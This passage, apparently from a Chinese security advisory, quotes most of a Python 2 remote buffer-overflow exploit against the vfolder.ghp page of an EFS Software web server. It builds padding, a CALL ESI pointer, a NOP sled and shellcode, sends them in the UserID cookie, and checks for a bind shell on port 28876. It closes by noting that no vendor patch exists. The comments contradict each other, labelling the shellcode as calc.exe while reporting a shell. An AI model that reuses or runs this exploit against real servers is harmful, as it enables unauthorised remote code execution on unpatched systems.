payload += "C"*108 # padding
payload += struct.pack("<I", 0x10023701) # pointer to CALL ESI
payload += "\x90"*20 # NOP sled
payload += shellcode # calc.exe
# craft the request
buf = (
"GET /vfolder.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + target + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: " + target + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
# send the request and payload to the server
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((target, port))
s1.send(buf)
s1.close()
try:
# check if we guessed the correct address by connecting to port 28876
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((target, 28876))
s2.close()
print "\n[+] Success! A shell is waiting on port 28876!"
break
except Exception,e:
pass
建议:
--------------------------------------------------------------------------------
厂商补丁:
EFS Software
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: